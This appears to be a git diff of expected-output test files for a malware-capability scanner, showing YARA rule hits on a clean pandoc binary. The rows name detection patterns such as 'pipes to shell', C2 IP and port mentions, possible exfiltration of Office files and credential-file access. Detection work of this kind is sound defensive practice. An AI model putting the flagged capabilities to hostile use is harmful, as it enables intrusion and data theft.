[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code) | +| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code)
[/var/run/nologin](https://github.com/search?q=%2Fvar%2Frun%2Fnologin&type=code)
[/var/log/btmp](https://github.com/search?q=%2Fvar%2Flog%2Fbtmp&type=code)
[/var/log/wtmp](https://github.com/search?q=%2Fvar%2Flog%2Fwtmp&type=code) | | LOW | [fs/tempdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir.yara#tempdir) | looks up location of temp directory | [TMPDIR](https://github.com/search?q=TMPDIR&type=code) | | LOW | [fs/tempdir/TMPDIR](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TMPDIR.yara#TMPDIR) | TMPDIR | [TMPDIR](https://github.com/search?q=TMPDIR&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [os/fd/sendfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile) | [transfer data between file descriptors](https://man7.org/linux/man-pages/man2/sendfile.2.html) | [sendfile](https://github.com/search?q=sendfile&type=code) | diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md index 064d08aba..db7e29d9c 100644 --- a/tests/linux/clean/pandoc.md +++ b/tests/linux/clean/pandoc.md @@ -2,12 +2,12 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| -| MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | $elf_head | -| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bindPort](https://github.com/search?q=bindPort&type=code)
[blIp](https://github.com/search?q=blIp&type=code)
[client_ip](https://github.com/search?q=client_ip&type=code)
[client_port](https://github.com/search?q=client_port&type=code)
[config_port](https://github.com/search?q=config_port&type=code)
[curlopt_port](https://github.com/search?q=curlopt_port&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[domain_port](https://github.com/search?q=domain_port&type=code)
[eIp](https://github.com/search?q=eIp&type=code)
[ereghet_ip](https://github.com/search?q=ereghet_ip&type=code)
[framed_ip](https://github.com/search?q=framed_ip&type=code)
[ftp_port](https://github.com/search?q=ftp_port&type=code)
[gamhet_ip](https://github.com/search?q=gamhet_ip&type=code)
[getPort](https://github.com/search?q=getPort&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[gomphet_ip](https://github.com/search?q=gomphet_ip&type=code)
[host_ip](https://github.com/search?q=host_ip&type=code)
[http_port](https://github.com/search?q=http_port&type=code)
[internal_ip](https://github.com/search?q=internal_ip&type=code)
[ipproto_ip](https://github.com/search?q=ipproto_ip&type=code)
[is_port](https://github.com/search?q=is_port&type=code)
[lat_port](https://github.com/search?q=lat_port&type=code)
[lloghet_ip](https://github.com/search?q=lloghet_ip&type=code)
[lnormhet_ip](https://github.com/search?q=lnormhet_ip&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[local_port](https://github.com/search?q=local_port&type=code)
[login_ip](https://github.com/search?q=login_ip&type=code)
[mIp](https://github.com/search?q=mIp&type=code)
[nas_ip](https://github.com/search?q=nas_ip&type=code)
[nas_port](https://github.com/search?q=nas_port&type=code)
[open_port](https://github.com/search?q=open_port&type=code)
[pg_port](https://github.com/search?q=pg_port&type=code)
[primary_ip](https://github.com/search?q=primary_ip&type=code)
[primary_port](https://github.com/search?q=primary_port&type=code)
[proxyPort](https://github.com/search?q=proxyPort&type=code)
[radius_port](https://github.com/search?q=radius_port&type=code)
[sam_port](https://github.com/search?q=sam_port&type=code)
[serverPort](https://github.com/search?q=serverPort&type=code)
[server_port](https://github.com/search?q=server_port&type=code)
[setPort](https://github.com/search?q=setPort&type=code)
[socketPort](https://github.com/search?q=socketPort&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[uriPort](https://github.com/search?q=uriPort&type=code)
[url_port](https://github.com/search?q=url_port&type=code)
[validate_ip](https://github.com/search?q=validate_ip&type=code)
[weibhet_ip](https://github.com/search?q=weibhet_ip&type=code)
[xIp](https://github.com/search?q=xIp&type=code) | +| MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | | +| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [curlopt_port](https://github.com/search?q=curlopt_port&type=code)
[primary_port](https://github.com/search?q=primary_port&type=code)
[client_port](https://github.com/search?q=client_port&type=code)
[config_port](https://github.com/search?q=config_port&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[domain_port](https://github.com/search?q=domain_port&type=code)
[internal_ip](https://github.com/search?q=internal_ip&type=code)
[lnormhet_ip](https://github.com/search?q=lnormhet_ip&type=code)
[radius_port](https://github.com/search?q=radius_port&type=code)
[server_port](https://github.com/search?q=server_port&type=code)
[validate_ip](https://github.com/search?q=validate_ip&type=code)
[ereghet_ip](https://github.com/search?q=ereghet_ip&type=code)
[gomphet_ip](https://github.com/search?q=gomphet_ip&type=code)
[ipproto_ip](https://github.com/search?q=ipproto_ip&type=code)
[lloghet_ip](https://github.com/search?q=lloghet_ip&type=code)
[local_port](https://github.com/search?q=local_port&type=code)
[primary_ip](https://github.com/search?q=primary_ip&type=code)
[serverPort](https://github.com/search?q=serverPort&type=code)
[socketPort](https://github.com/search?q=socketPort&type=code)
[weibhet_ip](https://github.com/search?q=weibhet_ip&type=code)
[client_ip](https://github.com/search?q=client_ip&type=code)
[framed_ip](https://github.com/search?q=framed_ip&type=code)
[gamhet_ip](https://github.com/search?q=gamhet_ip&type=code)
[http_port](https://github.com/search?q=http_port&type=code)
[open_port](https://github.com/search?q=open_port&type=code)
[proxyPort](https://github.com/search?q=proxyPort&type=code)
[bindPort](https://github.com/search?q=bindPort&type=code)
[ftp_port](https://github.com/search?q=ftp_port&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[lat_port](https://github.com/search?q=lat_port&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[login_ip](https://github.com/search?q=login_ip&type=code)
[nas_port](https://github.com/search?q=nas_port&type=code)
[sam_port](https://github.com/search?q=sam_port&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[url_port](https://github.com/search?q=url_port&type=code)
[getPort](https://github.com/search?q=getPort&type=code)
[host_ip](https://github.com/search?q=host_ip&type=code)
[is_port](https://github.com/search?q=is_port&type=code)
[pg_port](https://github.com/search?q=pg_port&type=code)
[setPort](https://github.com/search?q=setPort&type=code)
[uriPort](https://github.com/search?q=uriPort&type=code)
[nas_ip](https://github.com/search?q=nas_ip&type=code)
[blIp](https://github.com/search?q=blIp&type=code)
[eIp](https://github.com/search?q=eIp&type=code)
[mIp](https://github.com/search?q=mIp&type=code)
[xIp](https://github.com/search?q=xIp&type=code)
[IP](https://github.com/search?q=IP&type=code) | | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [inet_server_addr](https://github.com/search?q=inet_server_addr&type=code) | | MEDIUM | [c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID) | contains a client ID | [client_id](https://github.com/search?q=client_id&type=code) | | MEDIUM | [c2/discovery/dyndns](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/dyndns.yara#dynamic_dns_user) | uses dynamic DNS service | [dyndns](https://github.com/search?q=dyndns&type=code) | -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [Linux](https://github.com/search?q=Linux&type=code)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[https://](https://)
[macOS](https://github.com/search?q=macOS&type=code) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[Linux](https://github.com/search?q=Linux&type=code)
[macOS](https://github.com/search?q=macOS&type=code) | | MEDIUM | [collect/archives/unarchive](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/unarchive.yara#unarchive) | unarchives files | [unarchived](https://github.com/search?q=unarchived&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [ZIP64](https://github.com/search?q=ZIP64&type=code) | | MEDIUM | [collect/databases/mysql](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/mysql.yara#mysql) | accesses MySQL databases | [mysql](https://github.com/search?q=mysql&type=code) | @@ -16,19 +16,19 @@ | MEDIUM | [credential/server/htpasswd](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/server/htpasswd.yara#htpasswd) | Access .htpasswd files | [.htpasswd](https://github.com/search?q=.htpasswd&type=code) | | MEDIUM | [credential/sniffer/bpf](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/sniffer/bpf.yara#sniffer_bpf) | BPF (Berkeley Packet Filter) | [bpf](https://github.com/search?q=bpf&type=code) | | MEDIUM | [crypto/openssl](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/openssl.yara#openssl_user) | Uses OpenSSL | [OpenSSL](https://github.com/search?q=OpenSSL&type=code)
[openssl](https://github.com/search?q=openssl&type=code) | -| MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | -| MEDIUM | [data/base64/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-encode.yara#py_base64_encode) | encode base64 strings | [base64_encode](https://github.com/search?q=base64_encode&type=code) | -| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | +| MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [py_base64_decode::base64_decode](https://github.com/search?q=py_base64_decode%3A%3Abase64_decode&type=code) | +| MEDIUM | [data/base64/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-encode.yara#py_base64_encode) | encode base64 strings | [py_base64_encode::base64_encode](https://github.com/search?q=py_base64_encode%3A%3Abase64_encode&type=code) | +| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code)
[](https://github.com/search?q=%3Chtml%3E&type=code) | | MEDIUM | [data/hash/whirlpool](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/whirlpool.yara#whirlpool) | [hash function often used for cryptomining](https://en.wikipedia.org/wiki/Whirlpool_(hash_function)) | [WHIRLPOOL](https://github.com/search?q=WHIRLPOOL&type=code) | | MEDIUM | [discover/group/lookup](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/group/lookup.yara#getgrent) | get entry from group database | [endgrent](https://github.com/search?q=endgrent&type=code)
[getgrent](https://github.com/search?q=getgrent&type=code)
[setgrent](https://github.com/search?q=setgrent&type=code) | | MEDIUM | [discover/network/netstat](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/netstat.yara#netstat) | Uses 'netstat' for network information | [netstat](https://github.com/search?q=netstat&type=code) | | MEDIUM | [discover/process/egid](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/egid.yara#php_getmygid) | returns the effective group id of the current process | [getmygid](https://github.com/search?q=getmygid&type=code) | | MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [systeminfo](https://github.com/search?q=systeminfo&type=code) | -| MEDIUM | [discover/user/USERPROFILE](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USERPROFILE.yara#USERPROFILE_Desktop) | Looks up the Desktop directory for the current user | [Desktop](https://github.com/search?q=Desktop&type=code)
[USERPROFILE](https://github.com/search?q=USERPROFILE&type=code) | +| MEDIUM | [discover/user/USERPROFILE](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USERPROFILE.yara#USERPROFILE_Desktop) | Looks up the Desktop directory for the current user | [USERPROFILE](https://github.com/search?q=USERPROFILE&type=code)
[Desktop](https://github.com/search?q=Desktop&type=code) | | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [CmdForListBodyStartCmd](https://github.com/search?q=CmdForListBodyStartCmd&type=code)
[SystemziProcess_runCommand1_closure](https://github.com/search?q=SystemziProcess_runCommand1_closure&type=code)
[SystemziProcess_runCommand1_info](https://github.com/search?q=SystemziProcess_runCommand1_info&type=code)
[SystemziProcess_runCommand2_closure](https://github.com/search?q=SystemziProcess_runCommand2_closure&type=code)
[SystemziProcess_runCommand3_bytes](https://github.com/search?q=SystemziProcess_runCommand3_bytes&type=code)
[SystemziProcess_runCommand_closure](https://github.com/search?q=SystemziProcess_runCommand_closure&type=code)
[SystemziProcess_runCommand_info](https://github.com/search?q=SystemziProcess_runCommand_info&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [SystemziProcess_runCommand1_closure](https://github.com/search?q=SystemziProcess_runCommand1_closure&type=code)
[SystemziProcess_runCommand2_closure](https://github.com/search?q=SystemziProcess_runCommand2_closure&type=code)
[SystemziProcess_runCommand_closure](https://github.com/search?q=SystemziProcess_runCommand_closure&type=code)
[SystemziProcess_runCommand3_bytes](https://github.com/search?q=SystemziProcess_runCommand3_bytes&type=code)
[SystemziProcess_runCommand1_info](https://github.com/search?q=SystemziProcess_runCommand1_info&type=code)
[SystemziProcess_runCommand_info](https://github.com/search?q=SystemziProcess_runCommand_info&type=code)
[CmdForListBodyStartCmd](https://github.com/search?q=CmdForListBodyStartCmd&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code) | | MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | | MEDIUM | [exec/shell/command](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/command.yara#system) | [execute a shell command](https://man7.org/linux/man-pages/man3/system.3.html) | [system](https://github.com/search?q=system&type=code) | @@ -36,13 +36,13 @@ | MEDIUM | [exec/shell/pipe_sh](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/pipe_sh.yara#pipe_to_shell) | pipes to shell | [| sh](https://github.com/search?q=%7C+sh&type=code) | | MEDIUM | [exec/shell/power](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/powershell.yara#powershell) | runs powershell scripts | [powershellcode](https://github.com/search?q=powershellcode&type=code) | | MEDIUM | [exec/tty/pathname](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/tty/pathname.yara#ttyname) | returns the pathname of a terminal device | [ttyname](https://github.com/search?q=ttyname&type=code) | -| MEDIUM | [exfil/office_file_ext](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/office_file_ext.yara#office_extensions) | References multiple Office file extensions (possible exfil) | [docm](https://github.com/search?q=docm&type=code)
[docx](https://github.com/search?q=docx&type=code)
[eml](https://github.com/search?q=eml&type=code)
[ppam](https://github.com/search?q=ppam&type=code)
[ppt](https://github.com/search?q=ppt&type=code)
[pst](https://github.com/search?q=pst&type=code)
[xlsx](https://github.com/search?q=xlsx&type=code) | +| MEDIUM | [exfil/office_file_ext](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/office_file_ext.yara#office_extensions) | References multiple Office file extensions (possible exfil) | [docm](https://github.com/search?q=docm&type=code)
[docx](https://github.com/search?q=docx&type=code)
[ppam](https://github.com/search?q=ppam&type=code)
[xlsx](https://github.com/search?q=xlsx&type=code)
[eml](https://github.com/search?q=eml&type=code)
[ppt](https://github.com/search?q=ppt&type=code)
[pst](https://github.com/search?q=pst&type=code) | | MEDIUM | [fs/file/copy](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-copy.yara#file_copy) | copy files using cp | [copyFile](https://github.com/search?q=copyFile&type=code) | | MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFile](https://github.com/search?q=CreateFile&type=code) | | MEDIUM | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#DeleteFile) | delete a file | [DeleteFile](https://github.com/search?q=DeleteFile&type=code) | | MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#utimes) | [change file last access and modification times](https://linux.die.net/man/2/utimes) | [utimes](https://github.com/search?q=utimes&type=code) | | MEDIUM | [fs/mounts_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mounts-read.yara#mount_files) | [Parses active mounts (/etc/fstab, /etc/mtab)](https://linux.die.net/man/3/setmntent) | [/etc/mtab](https://github.com/search?q=%2Fetc%2Fmtab&type=code) | -| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/lua_XXXXXX](https://github.com/search?q=%2Ftmp%2Flua_XXXXXX&type=code)
[/tmp/pandoc-20241005-4994-bp6ag1/pandoc-3.5/.brew_home/.local/state/c](https://github.com/search?q=%2Ftmp%2Fpandoc-20241005-4994-bp6ag1%2Fpandoc-3.5%2F.brew_home%2F.local%2Fstate%2Fc&type=code) | +| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/pandoc-20241005-4994-bp6ag1/pandoc-3.5/.brew_home/.local/state/c](https://github.com/search?q=%2Ftmp%2Fpandoc-20241005-4994-bp6ag1%2Fpandoc-3.5%2F.brew_home%2F.local%2Fstate%2Fc&type=code)
[/tmp/lua_XXXXXX](https://github.com/search?q=%2Ftmp%2Flua_XXXXXX&type=code) | | MEDIUM | [fs/path/usr_local](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/usr-local.yara#usr_local_lib_path) | path reference within /usr/local/lib | [/usr/local/lib/lua/5.4/loadall.so](https://github.com/search?q=%2Fusr%2Flocal%2Flib%2Flua%2F5.4%2Floadall.so&type=code) | | MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | | MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%d/maps](https://github.com/search?q=%2Fproc%2F%25d%2Fmaps&type=code) | @@ -50,12 +50,12 @@ | MEDIUM | [fs/proc/pid_maps](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-maps.yara#proc_maps) | access process memory maps | [/proc/%d/maps](https://github.com/search?q=%2Fproc%2F%25d%2Fmaps&type=code) | | MEDIUM | [fs/proc/self_status](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-status.yara#proc_self_status) | gets status associated to this process, including capabilities | [/proc/self/status](https://github.com/search?q=%2Fproc%2Fself%2Fstatus&type=code) | | MEDIUM | [impact/infection/worm](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/infection/worm.yara#worm) | References 'Worm' | [worm](https://github.com/search?q=worm&type=code) | -| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [2_NetworkziTLSziExtension_decodeHeartBeat_closure](https://github.com/search?q=2_NetworkziTLSziExtension_decodeHeartBeat_closure&type=code)
[2_NetworkziTLSziExtension_decodeHeartBeat_info](https://github.com/search?q=2_NetworkziTLSziExtension_decodeHeartBeat_info&type=code)
[2_NetworkziTLSziExtension_zdtczqHeartBeat1_closur](https://github.com/search?q=2_NetworkziTLSziExtension_zdtczqHeartBeat1_closur&type=code)
[2_NetworkziTLSziExtension_zdtczqHeartBeat2_closur](https://github.com/search?q=2_NetworkziTLSziExtension_zdtczqHeartBeat2_closur&type=code)
[2_NetworkziTLSziExtension_zdtczqHeartBeat3_bytes](https://github.com/search?q=2_NetworkziTLSziExtension_zdtczqHeartBeat3_bytes&type=code)
[2_NetworkziTLSziExtension_zdtczqHeartBeatMode1_cl](https://github.com/search?q=2_NetworkziTLSziExtension_zdtczqHeartBeatMode1_cl&type=code)
[2_NetworkziTLSziExtension_zdtczqHeartBeatMode2_cl](https://github.com/search?q=2_NetworkziTLSziExtension_zdtczqHeartBeatMode2_cl&type=code)
[2_NetworkziTLSziExtension_zdtczqHeartBeatMode3_by](https://github.com/search?q=2_NetworkziTLSziExtension_zdtczqHeartBeatMode3_by&type=code)
[2_NetworkziTLSziExtension_zdtczqHeartBeatMode_clo](https://github.com/search?q=2_NetworkziTLSziExtension_zdtczqHeartBeatMode_clo&type=code)
[2_NetworkziTLSziExtension_zdtczqHeartBeat_closure](https://github.com/search?q=2_NetworkziTLSziExtension_zdtczqHeartBeat_closure&type=code)
[72_NetworkziTLSziExtension_zdfEqHeartBeatMode_clo](https://github.com/search?q=72_NetworkziTLSziExtension_zdfEqHeartBeatMode_clo&type=code)
[72_NetworkziTLSziExtension_zdfEqHeartBeat_closure](https://github.com/search?q=72_NetworkziTLSziExtension_zdfEqHeartBeat_closure&type=code)
[72_NetworkziTLSziStruct_zdbEIDzuHeartbeat1_closur](https://github.com/search?q=72_NetworkziTLSziStruct_zdbEIDzuHeartbeat1_closur&type=code)
[72_NetworkziTLSziStruct_zdbEIDzuHeartbeat_closure](https://github.com/search?q=72_NetworkziTLSziStruct_zdbEIDzuHeartbeat_closure&type=code)
[72_NetworkziTLSziStruct_zdmEIDzuHeartbeat_closure](https://github.com/search?q=72_NetworkziTLSziStruct_zdmEIDzuHeartbeat_closure&type=code)
[72_NetworkziTLSziStruct_zdmEIDzuHeartbeat_info](https://github.com/search?q=72_NetworkziTLSziStruct_zdmEIDzuHeartbeat_info&type=code)
[8f72_NetworkziTLSziExtension_zdbHeartBeatzuPeerAl](https://github.com/search?q=8f72_NetworkziTLSziExtension_zdbHeartBeatzuPeerAl&type=code)
[8f72_NetworkziTLSziExtension_zdbHeartBeatzuPeerNo](https://github.com/search?q=8f72_NetworkziTLSziExtension_zdbHeartBeatzuPeerNo&type=code)
[8f72_NetworkziTLSziExtension_zdmHeartBeatzuPeerAl](https://github.com/search?q=8f72_NetworkziTLSziExtension_zdmHeartBeatzuPeerAl&type=code)
[8f72_NetworkziTLSziExtension_zdmHeartBeatzuPeerNo](https://github.com/search?q=8f72_NetworkziTLSziExtension_zdmHeartBeatzuPeerNo&type=code)
[HeartBeat_PeerAll](https://github.com/search?q=HeartBeat_PeerAll&type=code)
[HeartBeat_PeerNot](https://github.com/search?q=HeartBeat_PeerNot&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeat1_closur](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeat1_closur&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeat1_info](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeat1_info&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeat2_bytes](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeat2_bytes&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeat3_bytes](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeat3_bytes&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeat4_bytes](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeat4_bytes&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeat5_bytes](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeat5_bytes&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeatMode1_cl](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeatMode1_cl&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeatMode1_in](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeatMode1_in&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeatMode2_cl](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeatMode2_cl&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeatMode3_cl](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeatMode3_cl&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeatMode_clo](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeatMode_clo&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeatModezuzd](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeatModezuzd&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeat_closure](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeat_closure&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeatzuzdcsho](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeatzuzdcsho&type=code)
[_NetworkziTLSziExtension_zdfldZCHeartBeatModeZCfr](https://github.com/search?q=_NetworkziTLSziExtension_zdfldZCHeartBeatModeZCfr&type=code)
[extensionDecode: HeartBeat](https://github.com/search?q=extensionDecode%3A+HeartBeat&type=code)
[f72_NetworkziTLSziExtension_fromHeartBeatMode1_cl](https://github.com/search?q=f72_NetworkziTLSziExtension_fromHeartBeatMode1_cl&type=code)
[f72_NetworkziTLSziExtension_fromHeartBeatMode1_in](https://github.com/search?q=f72_NetworkziTLSziExtension_fromHeartBeatMode1_in&type=code)
[f72_NetworkziTLSziExtension_zdtcHeartBeat1_closur](https://github.com/search?q=f72_NetworkziTLSziExtension_zdtcHeartBeat1_closur&type=code)
[f72_NetworkziTLSziExtension_zdtcHeartBeat2_bytes](https://github.com/search?q=f72_NetworkziTLSziExtension_zdtcHeartBeat2_bytes&type=code)
[f72_NetworkziTLSziExtension_zdtcHeartBeatMode1_cl](https://github.com/search?q=f72_NetworkziTLSziExtension_zdtcHeartBeatMode1_cl&type=code)
[f72_NetworkziTLSziExtension_zdtcHeartBeatMode2_by](https://github.com/search?q=f72_NetworkziTLSziExtension_zdtcHeartBeatMode2_by&type=code)
[f72_NetworkziTLSziExtension_zdtcHeartBeatMode_clo](https://github.com/search?q=f72_NetworkziTLSziExtension_zdtcHeartBeatMode_clo&type=code)
[f72_NetworkziTLSziExtension_zdtcHeartBeat_closure](https://github.com/search?q=f72_NetworkziTLSziExtension_zdtcHeartBeat_closure&type=code)
[heartbeat](https://github.com/search?q=heartbeat&type=code)
[nsion_zdfldZCHeartBeatModeZCfromHeartBeatMode_clo](https://github.com/search?q=nsion_zdfldZCHeartBeatModeZCfromHeartBeatMode_clo&type=code)
[nsion_zdfldZCHeartBeatModeZCfromHeartBeatMode_inf](https://github.com/search?q=nsion_zdfldZCHeartBeatModeZCfromHeartBeatMode_inf&type=code)
[orkziTLSziExtension_zdfExtensionHeartBeat1_closur](https://github.com/search?q=orkziTLSziExtension_zdfExtensionHeartBeat1_closur&type=code)
[orkziTLSziExtension_zdfExtensionHeartBeat1_info](https://github.com/search?q=orkziTLSziExtension_zdfExtensionHeartBeat1_info&type=code)
[orkziTLSziExtension_zdfExtensionHeartBeat2_closur](https://github.com/search?q=orkziTLSziExtension_zdfExtensionHeartBeat2_closur&type=code)
